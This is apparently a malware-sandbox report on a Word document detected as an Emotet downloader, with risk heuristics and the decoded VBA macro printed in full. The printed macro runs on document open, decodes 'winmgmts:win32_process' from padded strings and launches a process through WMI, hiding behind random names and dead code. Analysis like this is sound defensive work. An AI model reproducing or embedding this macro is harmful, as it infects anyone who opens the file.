MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.EmotetRed0121-9822961-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.EmotetRed0121-9822961-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Shaqdm8bfwad = CreateObject(Ouefbbewa7ikgdlri) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13500 bytes |
SHA-256: 1b2b00055c80e68b6aa687bc64112642d1a28d5afaeaab4b15d181d8f231de3b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
108 of 196 identifiers look randomly generated (e.g. 'Ve8ody9kr3y0rabzp4') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Zrr234efv7j6dfwr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Nauw80ycpl9g4a8c
End Sub
Attribute VB_Name = "Xod5qe3cijo"
Attribute VB_Name = "Cn9inbqhh7rb"
Function Nauw80ycpl9g4a8c()
On Error Resume Next
V1 = Rwqlpkfene6qza_mu8 + Zrr234efv7j6dfwr.Content + L6upc7nnidv40cli
GoTo qgJHIBDk
Dim PkEMQHQI As Paragraph
Set jXcEdDdh = zpjupEh
For Each PkEMQHQI In Zrr234efv7j6dfwr.Paragraphs
Set XkpfH = eCRuCvmR
If Left(PkEMQHQI.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
qgJHIBDk = PkEMQHQI.Range.ListFormat.ListString
ElseIf InStr(PkEMQHQI.Range.Text, "kkiew") > 1 Then
kkDQfX = PkEMQHQI.Range.Text
kkDQfX = Replace(saw, "sjgwb", "hqkwjbjdasd" & qgJHIBDk)
PkEMQHQI.Range.Text = kkDQfX
Set PkEMQHQI.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set BjcJA = ArYQiJ
Next PkEMQHQI
qgJHIBDk:
U7 = "sg yw ahpsg yw ah"
F37gkh5_9t3r = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
GoTo xtPlEAvEB
Dim fIusJqBAL As Paragraph
Set RmhgAAs = uQHtALnA
For Each fIusJqBAL In Zrr234efv7j6dfwr.Paragraphs
Set qnRgF = lByKJ
If Left(fIusJqBAL.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
xtPlEAvEB = fIusJqBAL.Range.ListFormat.ListString
ElseIf InStr(fIusJqBAL.Range.Text, "kkiew") > 1 Then
CyayE = fIusJqBAL.Range.Text
CyayE = Replace(saw, "sjgwb", "hqkwjbjdasd" & xtPlEAvEB)
fIusJqBAL.Range.Text = CyayE
Set fIusJqBAL.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set gOmpaGAD = ISMirbJQH
Next fIusJqBAL
xtPlEAvEB:
Hy2hjp4_v0706 = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
GoTo nnFWNeJaY
Dim SGiFs As Paragraph
Set OdUCHIyBD = BUWGFwQCg
For Each SGiFs In Zrr234efv7j6dfwr.Paragraphs
Set sGoOXGGJ = TcIDRFo
If Left(SGiFs.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
nnFWNeJaY = SGiFs.Range.ListFormat.ListString
ElseIf InStr(SGiFs.Range.Text, "kkiew") > 1 Then
yLAlF = SGiFs.Range.Text
yLAlF = Replace(saw, "sjgwb", "hqkwjbjdasd" & nnFWNeJaY)
SGiFs.Range.Text = yLAlF
Set SGiFs.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set tsHIDq = FyEFKF
Next SGiFs
nnFWNeJaY:
Ve8ody9kr3y0rabzp4 = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
GoTo iYklDEA
Dim WxOGCHzmj As Paragraph
Set VITsNGfPD = eQkFD
For Each WxOGCHzmj In Zrr234efv7j6dfwr.Paragraphs
Set tXqhdfDBF = bvuTm
If Left(WxOGCHzmj.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
iYklDEA = WxOGCHzmj.Range.ListFormat.ListString
ElseIf InStr(WxOGCHzmj.Range.Text, "kkiew") > 1 Then
kTDpu = WxOGCHzmj.Range.Text
kTDpu = Replace(saw, "sjgwb", "hqkwjbjdasd" & iYklDEA)
WxOGCHzmj.Range.Text = kTDpu
Set WxOGCHzmj.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set eayuAL = DvusGw
Next WxOGCHzmj
iYklDEA:
K54a9h7okem60vyz = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
GoTo pdVdIL
Dim EUPQF As Paragraph
Set bRRtJHA = kTcZVBIEA
For Each EUPQF In Zrr234efv7j6dfwr.Paragraphs
Set ithfAA = LQCzBFBIC
If Left(EUPQF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
pdVdIL = EUPQF.Range.ListFormat.ListString
ElseIf InStr(EUPQF.Range.Text, "kkiew") > 1 Then
CDmYCFCHh = EUPQF.Range.Text
CDmYCFCHh = Replace(saw, "sjgwb", "hqkwjbjdasd" & pdVdIL)
EUPQF.Range.Text = CDmYCFCHh
Set EUPQF.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set FfijSCII = GxNSH
Next EUPQF
pdVdIL:
O9uo3zajcs4cwus0t = Ve8ody9kr3y0rabzp4 + K54a9h7okem60vyz + Hy2hjp4_v0706 + U7 + F37gkh5_9t3r
GoTo XqJfDu
Dim VhHNG As Paragraph
Set dMzCLzB = XSLGn
For Each VhHNG In Zrr234efv7j6dfwr.Paragraphs
Set JGFrGwJx = CPuSFEBH
If Left(VhHNG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
XqJfDu = VhHNG.Range.ListFormat.ListString
ElseIf InStr(VhHNG.Range.Text, "kkiew") > 1 Then
MgeehAE = VhHNG.Range.Text
MgeehAE = Replace(saw, "sjgwb", "hqkwjbjdasd" & XqJfDu)
VhHNG.Range.Text = MgeehAE
Set VhHNG.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set mqWzIC = oLTKEFI
Next VhHNG
XqJfDu:
Ouefbbewa7ikgdlri = M940ybl7gxsn0(O9uo3zajcs4cwus0t)
GoTo eEuSBx
Dim UvZZiJCFB As Paragraph
Set yEYkDAI = AkWgBC
For Each UvZZiJCFB In Zrr234efv7j6dfwr.Paragraphs
Set wUDKxAwJ = mDqJMCHJG
If Left(UvZZiJCFB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
eEuSBx = UvZZiJCFB.Range.ListFormat.ListString
ElseIf InStr(UvZZiJCFB.Range.Text, "kkiew") > 1 Then
WGyFEHDCs = UvZZiJCFB.Range.Text
WGyFEHDCs = Replace(saw, "sjgwb", "hqkwjbjdasd" & eEuSBx)
UvZZiJCFB.Range.Text = WGyFEHDCs
Set UvZZiJCFB.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set WkWjU = tKniopRDI
Next UvZZiJCFB
eEuSBx:
Set Shaqdm8bfwad = CreateObject(Ouefbbewa7ikgdlri)
GoTo BweyJWjN
Dim eXdIsXH As Paragraph
Set yUVdBI = FdwNm
For Each eXdIsXH In Zrr234efv7j6dfwr.Paragraphs
Set vQYVFu = WjGnICj
If Left(eXdIsXH.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
BweyJWjN = eXdIsXH.Range.ListFormat.ListString
ElseIf InStr(eXdIsXH.Range.Text, "kkiew") > 1 Then
JfkGCMFBJ = eXdIsXH.Range.Text
JfkGCMFBJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & BweyJWjN)
eXdIsXH.Range.Text = JfkGCMFBJ
Set eXdIsXH.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set pIvZbm = iqcZCA
Next eXdIsXH
BweyJWjN:
KK = M940ybl7gxsn0(Mid(V1, (4), Len(V1)))
Shaqdm8bfwad.Create KK, U5_f_u03ozq_vmk, Cf38fkmovvb5czp
GoTo fjDbJNJPE
Dim PtkdV As Paragraph
Set cMGoJCNVA = GJlcnAJF
For Each PtkdV In Zrr234efv7j6dfwr.Paragraphs
Set qJMVH = fWdzlF
If Left(PtkdV.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
fjDbJNJPE = PtkdV.Range.ListFormat.ListString
ElseIf InStr(PtkdV.Range.Text, "kkiew") > 1 Then
ovddIBdH = PtkdV.Range.Text
ovddIBdH = Replace(saw, "sjgwb", "hqkwjbjdasd" & fjDbJNJPE)
PtkdV.Range.Text = ovddIBdH
Set PtkdV.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set IPpqJRIHA = QBZkFCjDB
Next PtkdV
fjDbJNJPE:
End Function
Function M940ybl7gxsn0(Oq65ksqlyqv)
On Error Resume Next
GoTo LocCJZl
Dim pnZRAEAH As Paragraph
Set sPLPeJYJJ = bSxgGS
For Each pnZRAEAH In Zrr234efv7j6dfwr.Paragraphs
Set OEqhJE = LwmxBVIo
If Left(pnZRAEAH.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
LocCJZl = pnZRAEAH.Range.ListFormat.ListString
ElseIf InStr(pnZRAEAH.Range.Text, "kkiew") > 1 Then
vKCSIXInm = pnZRAEAH.Range.Text
vKCSIXInm = Replace(saw, "sjgwb", "hqkwjbjdasd" & LocCJZl)
pnZRAEAH.Range.Text = vKCSIXInm
Set pnZRAEAH.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set GmvyqA = FpkHHFB
Next pnZRAEAH
LocCJZl:
Z1vu7shx6ohh = Oq65ksqlyqv
GoTo EcOCDH
Dim TTxCHfEJ As Paragraph
Set rKDDEJ = wDFTJZ
For Each TTxCHfEJ In Zrr234efv7j6dfwr.Paragraphs
Set HdjvFIB = ppZxs
If Left(TTxCHfEJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
EcOCDH = TTxCHfEJ.Range.ListFormat.ListString
ElseIf InStr(TTxCHfEJ.Range.Text, "kkiew") > 1 Then
oIZOycGL = TTxCHfEJ.Range.Text
oIZOycGL = Replace(saw, "sjgwb", "hqkwjbjdasd" & EcOCDH)
TTxCHfEJ.Range.Text = oIZOycGL
Set TTxCHfEJ.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set sfEiAD = YttgyJHB
Next TTxCHfEJ
EcOCDH:
Jau59gohhc5mpcaict = Ugfdof20y_tl8(Z1vu7shx6ohh)
GoTo uYLIH
Dim zxiuDSBC As Paragraph
Set yRvSBDLC = erAEW
For Each zxiuDSBC In Zrr234efv7j6dfwr.Paragraphs
Set rPYjLQB = CligkqA
If Left(zxiuDSBC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
uYLIH = zxiuDSBC.Range.ListFormat.ListString
ElseIf InStr(zxiuDSBC.Range.Text, "kkiew") > 1 Then
yYVear = zxiuDSBC.Range.Text
yYVear = Replace(saw, "sjgwb", "hqkwjbjdasd" & uYLIH)
zxiuDSBC.Range.Text = yYVear
Set zxiuDSBC.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set OwgXbBHA = JIoTFRGfg
Next zxiuDSBC
uYLIH:
M940ybl7gxsn0 = Jau59gohhc5mpcaict
GoTo jziaFFHEF
Dim KGROJG As Paragraph
Set zddVECCDD = GyCLISD
For Each KGROJG In Zrr234efv7j6dfwr.Paragraphs
Set kNuSDBPHB = GQIVJDlG
If Left(KGROJG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
jziaFFHEF = KGROJG.Range.ListFormat.ListString
ElseIf InStr(KGROJG.Range.Text, "kkiew") > 1 Then
uJBkFLHIN = KGROJG.Range.Text
uJBkFLHIN = Replace(saw, "sjgwb", "hqkwjbjdasd" & jziaFFHEF)
KGROJG.Range.Text = uJBkFLHIN
Set KGROJG.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set bTGpjH = nNVFHJEZ
Next KGROJG
jziaFFHEF:
End Function
Function Ugfdof20y_tl8(Qw90xeh0iky_)
GoTo HfmzOPDEX
Dim espbwWsA As Paragraph
Set lxfjR = pkVenCPvE
For Each espbwWsA In Zrr234efv7j6dfwr.Paragraphs
Set sAUHADFGJ = zPOZNeHs
If Left(espbwWsA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
HfmzOPDEX = espbwWsA.Range.ListFormat.ListString
ElseIf InStr(espbwWsA.Range.Text, "kkiew") > 1 Then
vJllo = espbwWsA.Range.Text
vJllo = Replace(saw, "sjgwb", "hqkwjbjdasd" & HfmzOPDEX)
espbwWsA.Range.Text = vJllo
Set espbwWsA.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set SXHRLB = LIvJfJC
Next espbwWsA
HfmzOPDEX:
GoTo IQSOFi
Dim HoqHZEBAE As Paragraph
Set vbtbFJIAt = dhYLg
For Each HoqHZEBAE In Zrr234efv7j6dfwr.Paragraphs
Set RauDJy = qGozJ
If Left(HoqHZEBAE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
IQSOFi = HoqHZEBAE.Range.ListFormat.ListString
ElseIf InStr(HoqHZEBAE.Range.Text, "kkiew") > 1 Then
uIPhxJIq = HoqHZEBAE.Range.Text
uIPhxJIq = Replace(saw, "sjgwb", "hqkwjbjdasd" & IQSOFi)
HoqHZEBAE.Range.Text = uIPhxJIq
Set HoqHZEBAE.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set QyrHFHDAH = nukdsrU
Next HoqHZEBAE
IQSOFi:
GoTo CFQQJE
Dim wHQiPJAIC As Paragraph
Set eebRpHD = IQfvrE
For Each wHQiPJAIC In Zrr234efv7j6dfwr.Paragraphs
Set SGxVJiM = wvYYDGDSX
If Left(wHQiPJAIC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
CFQQJE = wHQiPJAIC.Range.ListFormat.ListString
ElseIf InStr(wHQiPJAIC.Range.Text, "kkiew") > 1 Then
kGdRuHH = wHQiPJAIC.Range.Text
kGdRuHH = Replace(saw, "sjgwb", "hqkwjbjdasd" & CFQQJE)
wHQiPJAIC.Range.Text = kGdRuHH
Set wHQiPJAIC.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set vaOIG = vpUHEAAbv
Next wHQiPJAIC
CFQQJE:
Ugfdof20y_tl8 = Replace(Qw90xeh0iky_, "sg yw ah", Ft8q6p97ggtp)
GoTo VxjDR
Dim XRnUCBQ As Paragraph
Set hftPzFIy = dctJFIGgI
For Each XRnUCBQ In Zrr234efv7j6dfwr.Paragraphs
Set LxNSICFGA = yXyEuG
If Left(XRnUCBQ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
VxjDR = XRnUCBQ.Range.ListFormat.ListString
ElseIf InStr(XRnUCBQ.Range.Text, "kkiew") > 1 Then
xKgAJqMG = XRnUCBQ.Range.Text
xKgAJqMG = Replace(saw, "sjgwb", "hqkwjbjdasd" & VxjDR)
XRnUCBQ.Range.Text = xKgAJqMG
Set XRnUCBQ.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set sLJHIAu = DzIECBFmB
Next XRnUCBQ
VxjDR:
GoTo UUXWHDEuR
Dim RaEwG As Paragraph
Set VYiKlEo = ZnqEqJNCG
For Each RaEwG In Zrr234efv7j6dfwr.Paragraphs
Set brDPII = FuRqMJCEH
If Left(RaEwG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
UUXWHDEuR = RaEwG.Range.ListFormat.ListString
ElseIf InStr(RaEwG.Range.Text, "kkiew") > 1 Then
YBitQEdu = RaEwG.Range.Text
YBitQEdu = Replace(saw, "sjgwb", "hqkwjbjdasd" & UUXWHDEuR)
RaEwG.Range.Text = YBitQEdu
Set RaEwG.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set xBPiAtJb = jDzXDBA
Next RaEwG
UUXWHDEuR:
GoTo XILGHA
Dim tzUACC As Paragraph
Set YxIuEAAjE = LbNCA
For Each tzUACC In Zrr234efv7j6dfwr.Paragraphs
Set DEOMVy = HwhJBDel
If Left(tzUACC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
XILGHA = tzUACC.Range.ListFormat.ListString
ElseIf InStr(tzUACC.Range.Text, "kkiew") > 1 Then
mOpEbVS = tzUACC.Range.Text
mOpEbVS = Replace(saw, "sjgwb", "hqkwjbjdasd" & XILGHA)
tzUACC.Range.Text = mOpEbVS
Set tzUACC.Range.ParagraphStyle = Zrr234efv7j6dfwr.Styles("Normal")
End If
Set asPNBFvHh = WiDxITBF
Next tzUACC
XILGHA:
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.